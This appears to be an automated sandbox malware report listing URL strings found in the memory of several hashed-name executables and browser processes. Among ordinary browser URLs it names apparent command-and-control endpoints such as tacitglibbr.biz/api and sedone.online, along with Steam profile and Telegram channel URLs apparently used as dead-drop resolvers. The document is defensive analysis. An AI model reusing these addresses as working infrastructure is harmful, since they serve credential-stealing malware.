Source: 95bf820dd4.exe, 0000000E.00000003.3094894921.0000000000792000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3060088128.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3084521833.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3037089965.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/w
Source: 95bf820dd4.exe, 0000000E.00000003.2986323548.00000000007B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.onlinee
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svgwebcompat-reporter%40mozilla.org:1.5.1
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000027.00000002.3445046773.00000269D9254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000010.00000003.3153781356.000044C0016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152243921.000044C0017A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3154136056.000044C00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsMicrosoft
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/osof
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900AP
Source: 95bf820dd4.exe, 0000000E.00000003.2901822680.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199807592927
Source: 95bf820dd4.exe, 0000000E.00000003.2901822680.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.s$
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3456131295.00000269D9FB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000027.00000003.3374061865.00000269DF4AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.orgremoveTabsProgressListenerbrowser.tabs.drawInTitlebarGeolocationPermissio
Source: 95bf820dd4.exe, 0000000E.00000003.2927405446.000000000079A000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.2927405446.000000000078C000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.2901822680.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0r
Source: 95bf820dd4.exe, 0000000E.00000003.2927405446.000000000079A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0r(
Source: 95bf820dd4.exe, 0000000E.00000003.2901822680.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
Source: ccdb824191.exe, 00000013.00000003.3430139663.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3392329460.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3206485194.0000000001239000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3283429600.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3288195078.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3289659520.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3357783243.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/
Source: ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/##
Source: ccdb824191.exe, 00000013.00000003.3288752753.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3300305625.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/0
Source: ccdb824191.exe, 0000000F.00000003.3323957054.0000000001342000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3316873570.000000000133D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3272963238.000000000133D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/H
Source: ccdb824191.exe, 0000000F.00000003.3323957054.0000000001342000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3244333445.000000000133D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3316873570.000000000133D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3272963238.000000000133D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/P
Source: ccdb824191.exe, 0000000F.00000003.3210749828.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3216410803.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3218097518.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3217685737.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3214700678.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3206777291.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3213502349.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3209528838.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3212351202.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3207593806.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3207101185.00000000058E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/Re
Source: ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3300305625.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3453918481.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/api
Source: ccdb824191.exe, 00000013.00000003.3392329460.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/api19
Source: ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/apiA
Source: ccdb824191.exe, 0000000F.00000003.3060620978.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/apiH
Source: ccdb824191.exe, 00000013.00000003.3283429600.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3288195078.0000000005ACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/apiMziqU
Source: ccdb824191.exe, 0000000F.00000003.3272963238.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/api_
Source: ccdb824191.exe, 0000000F.00000003.3272963238.000000000134C000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3316873570.000000000134C000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3323957054.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/apiograH
Source: ccdb824191.exe, 00000013.00000003.3430895142.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/api~
Source: ccdb824191.exe, 00000013.00000003.3288752753.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3300305625.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/k
Source: ccdb824191.exe, 00000013.00000003.3467839896.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3430139663.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/opZ
Source: ccdb824191.exe, 0000000F.00000003.3323957054.0000000001342000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3060343417.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3244333445.000000000133D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3316873570.000000000133D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3272963238.000000000133D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3060620978.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/pi
Source: ccdb824191.exe, 00000013.00000003.3288752753.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3300305625.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/pi:
Source: ccdb824191.exe, 00000013.00000003.3467839896.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3430139663.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz/tab
Source: ccdb824191.exe, 00000013.00000003.3206485194.0000000001239000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz:443/api
Source: ccdb824191.exe, 00000013.00000003.3352890856.0000000001239000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz:443/apil
Source: ccdb824191.exe, 00000013.00000003.3206485194.0000000001239000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tacitglibbr.biz:443/api~
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: 95bf820dd4.exe, 0000000E.00000003.2927148097.00000000007B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3449103760.00000269D9420000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3326947439.00000269DC86F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3326323227.00000269DC838000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3325516382.00000269DC600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3448689533.00000269D9320000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000003.3326626929.00000269DC853000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3109896893.000044C000FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112544180.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000010.00000003.3112300126.000044C000FD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000010.00000003.3112300126.000044C000FD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000010.00000003.3153781356.000044C0016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152243921.000044C0017A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3154136056.000044C00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
